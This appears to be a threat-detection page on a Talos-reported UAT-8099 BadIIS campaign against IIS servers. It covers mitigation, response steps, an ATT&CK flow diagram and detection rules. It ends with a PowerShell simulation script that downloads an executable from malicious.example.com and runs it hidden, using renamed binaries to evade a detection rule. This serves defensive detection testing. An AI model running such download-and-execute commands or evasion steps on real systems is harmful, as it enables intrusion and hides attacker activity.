Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Cisco Talos reports a fresh UAT-8099 campaign targeting vulnerable IIS web servers across Asia. The actor deploys customized BadIIS variants that include regional identifiers and relies on web shells, PowerShell, and the GotoHTTP remote control tool for follow-on control. Persistence has expanded to include creation of hidden local accounts and the use of legitimate red-team utilities to blend into administrative activity. The tradecraft overlaps with the earlier WEBJACK operation and appears focused on SEO fraud impacting sites in Thailand and Vietnam.
Investigation
Talos reviewed DNS telemetry, file hashes, and malicious scripts to reconstruct the intrusion chain. Analysts observed web shells combined with tooling such as SoftEther VPN and EasyTier, plus a set of bespoke utilities including Sharp4RemoveLog, CnCrypt Protect, OpenArk64, and GotoHTTP. Two region-tuned BadIIS strains—IISHijack and asdSearchEngine—were reverse engineered, exposing hard-coded country codes, selective request filtering, and XOR-encrypted C2 configuration. An ELF build of BadIIS with matching C2 domains was also identified on VirusTotal.
Mitigation
Patch exposed IIS vulnerabilities, strengthen web application firewall enforcement, and monitor for creation of hidden local accounts (for example, admin$, mysql$, and similar). Detect PowerShell activity that downloads or launches GotoHTTP and block outbound communication to known C2 domains. Use endpoint controls to alert on execution of the identified custom utilities and on unexpected modifications within web server directories.
Response
If indicators are found, isolate the server, remove web shells, and delete hidden accounts. Preserve BadIIS binaries and related scripts for forensic analysis, and perform full network-traffic review to identify C2 activity. Restore from a known-good backup and re-harden IIS configuration to prevent reinfection.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ffcc99 %% Node definitions action_exploit_public_facing["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Exploits vulnerabilities in internetu2011facing applications to gain initial access.<br/><b>Details</b>: Compromised IIS servers via known vulnerabilities and deployed web shells."] class action_exploit_public_facing action tool_web_shell["<b>Tool</b> – <b>Name</b>: Web Shell<br/><b>Description</b>: Server side script enabling remote command execution."] class tool_web_shell tool action_powershell_execution["<b>Action</b> – <b>T1059.001 PowerShell</b><br/><b>Description</b>: Use PowerShell to execute commands and payloads.<br/><b>Commands</b>: whoami, tasklist, download tools."] class action_powershell_execution action tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Windows commandu2011line shell and scripting language."] class tool_powershell tool action_system_info_discovery["<b>Action</b> – <b>T1082 System Information Discovery</b><br/><b>Description</b>: Gather OS and hardware configuration.<br/><b>Commands</b>: system info collection, user context logging."] class action_system_info_discovery action action_create_account["<b>Action</b> – <b>T1136 Create Account</b><br/><b>Description</b>: Create hidden local accounts for persistence."] class action_create_account action action_valid_accounts["<b>Action</b> – <b>T1078 Valid Accounts</b><br/><b>Description</b>: Use created accounts for ongoing access and privilege escalation."] class action_valid_accounts action action_clear_event_logs["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b><br/><b>Description</b>: Remove logs to hide activity.<br/><b>Tool</b>: Sharp4RemoveLog utility."] class action_clear_event_logs action tool_sharp4removelog["<b>Tool</b> – <b>Name</b>: Sharp4RemoveLog<br/><b>Description</b>: Utility to erase Windows event logs."] class tool_sharp4removelog tool action_disable_event_logging["<b>Action</b> – <b>T1562.002 Disable Windows Event Logging</b><br/><b>Description</b>: Impair defenses by turning off logging."] class action_disable_event_logging action action_obfuscate_files["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/><b>Description</b>: Use XOR encryption (key 0x7A) to hide C2 configuration and HTML templates."] class action_obfuscate_files action malware_badiis["<b>Malware</b> – <b>Name</b>: BadIIS<br/><b>Description</b>: Variants employing XOR obfuscation."] class malware_badiis malware action_lateral_tool_transfer["<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Transfer tools and files into victim environment.<br/><b>Tools</b>: BadIIS binaries, GotoHTTP, SoftEther VPN, EasyTier."] class action_lateral_tool_transfer action tool_gotohttp["<b>Tool</b> – <b>Name</b>: GotoHTTP<br/><b>Description</b>: Transfers files over HTTP/HTTPS."] class tool_gotohttp tool tool_softether["<b>Tool</b> – <b>Name</b>: SoftEther VPN<br/><b>Description</b>: Multiu2011hop proxy for tunneling traffic."] class tool_softether tool tool_easytier["<b>Tool</b> – <b>Name</b>: EasyTier<br/><b>Description</b>: Multiu2011hop proxy for tunneling traffic."] class tool_easytier tool action_proxy_multi_hop["<b>Action</b> – <b>T1090.003 Proxy Multi-hop Proxy</b><br/><b>Description</b>: Use proxy tools to hide origin of traffic."] class action_proxy_multi_hop action action_web_protocol_c2["<b>Action</b> – <b>T1071.001 Web Protocols</b><br/><b>Description</b>: Communicate C2 over HTTP/HTTPS using GotoHTTP."] class action_web_protocol_c2 action %% Connections showing flow action_exploit_public_facing –>|uses| tool_web_shell tool_web_shell –>|enables| action_powershell_execution action_powershell_execution –>|uses| tool_powershell tool_powershell –>|executes| action_system_info_discovery action_system_info_discovery –>|leads to| action_create_account action_create_account –>|enables| action_valid_accounts action_valid_accounts –>|uses| action_clear_event_logs action_clear_event_logs –>|uses| tool_sharp4removelog action_clear_event_logs –>|also| action_disable_event_logging action_disable_event_logging –>|precedes| action_obfuscate_files action_obfuscate_files –>|implemented by| malware_badiis malware_badiis –>|facilitates| action_lateral_tool_transfer action_lateral_tool_transfer –>|transfers| tool_gotohttp action_lateral_tool_transfer –>|transfers| tool_softether action_lateral_tool_transfer –>|transfers| tool_easytier tool_softether –>|used for| action_proxy_multi_hop tool_easytier –>|used for| action_proxy_multi_hop action_proxy_multi_hop –>|supports| action_web_protocol_c2 tool_gotohttp –>|used in| action_web_protocol_c2 "
Attack Flow
Detections
Download or Upload via Powershell (via cmdline)
View
Suspicious Files in Public User Profile (via file_event)
View
Possible Account or Group Enumeration (via cmdline)
View
Detect PowerShell Command Execution for GotoHTTP Deployment [Windows Powershell]
View
Detection of BadIIS Malware Targeting IIS Servers for SEO Fraud [Webserver]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
-
Attack Narrative & Commands:
An attacker has gained initial foothold on a compromised web server. They create a hidden directory calledbad_iisunder the IIS web root and drop a custom‑named web‑shell binaryshell_xyz.exe(avoiding the literal string “web shell”). Using the shell, they laterally execute a PowerShell payload that downloads the GotoHTTP binary, renames it tosvc_update.exe, and runs it. Because the image names are obfuscated, the original rule’sImage|containschecks are bypassed, while the command line still contains “PowerShell”. -
Regression Test Script: This script reproduces the described steps and generates telemetry similar to the BadIIS attack without using the exact strings the rule watches for.
# BadIIS simulation – obfuscated version $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" New-Item -Path $payloadDir -ItemType Directory -Force | Out-Null # Deploy a renamed web‑shell (binary copy of a known benign exe) $shellSrc = "$env:SystemRootSystem32notepad.exe" $shellDst = Join-Path $payloadDir "shell_xyz.exe" Copy-Item -Path $shellSrc -Destination $shellDst -Force # Simulate the web‑shell invoking PowerShell to download GotoHTTP $gotoUrl = "http://malicious.example.com/GotoHTTP.exe" $gotoDst = "C:WindowsTempsvc_update.exe" $psCommand = @" Invoke-WebRequest -Uri '$gotoUrl' -OutFile '$gotoDst'; Start-Process -FilePath '$gotoDst' -WindowStyle Hidden; "@ # Execute the PowerShell payload via the renamed web‑shell (process creation) Start-Process -FilePath $shellDst -ArgumentList "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -Command `$psCommand`" -WindowStyle Hidden Write-Output "BadIIS simulation executed." -
Cleanup Commands: Removes the planted artifacts and restores the environment.
# Cleanup BadIIS simulation artifacts $webRoot = "C:inetpubwwwroot" $payloadDir = Join-Path $webRoot "bad_iis" Remove-Item -Path $payloadDir -Recurse -Force -ErrorAction SilentlyContinue $gotoDst = "C:WindowsTempsvc_update.exe" Remove-Item -Path $gotoDst -Force -ErrorAction SilentlyContinue Write-Output "Cleanup completed."